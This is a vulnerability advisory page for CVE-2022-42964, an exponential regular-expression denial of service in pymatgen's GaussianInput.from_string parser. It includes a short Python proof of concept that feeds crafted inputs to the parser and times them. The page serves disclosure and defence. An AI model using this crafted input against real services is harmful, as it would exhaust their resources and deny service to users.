Headline

CVE-2022-42964: pymatgen ReDoS | XRAY-257184

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the pymatgen PyPI package, when an attacker is able to supply arbitrary input to the GaussianInput.from_string method

2 years ago

CVE

Open in Source

#dos

CVE-2022-42964 | CVSS 5.9

JFrog Severity:medium

Published 15 Oct. 2022 | Last updated 15 Oct. 2022

Exponential ReDoS in pymatgen leads to denial of service

pymatgen

pymatgen (,)

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the pymatgen PyPI package, when an attacker is able to supply arbitrary input to the GaussianInput.from_string method

import time
from pymatgen.io.gaussian import GaussianInput

def str_and_from_string(i):
    ans = """#P HF/6-31G(d) SCF=Tight SP

H4 C1

0 1
"""
    vulnerable_input = ans + 'C'+'0' * i + '!'+'\n'
    GaussianInput.from_string(vulnerable_input)

for i in range(1000):
    start = time.time()
    str_and_from_string(i)
    print(f"{i}: Done in {time.time() - start}")

No mitigations are supplied for this issue

NVD

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the pymatgen PyPI package, when an attacker is able to supply arbitrary input to the GaussianInput.from_string method

2 years ago

ghsa

Open in Source

#dos #git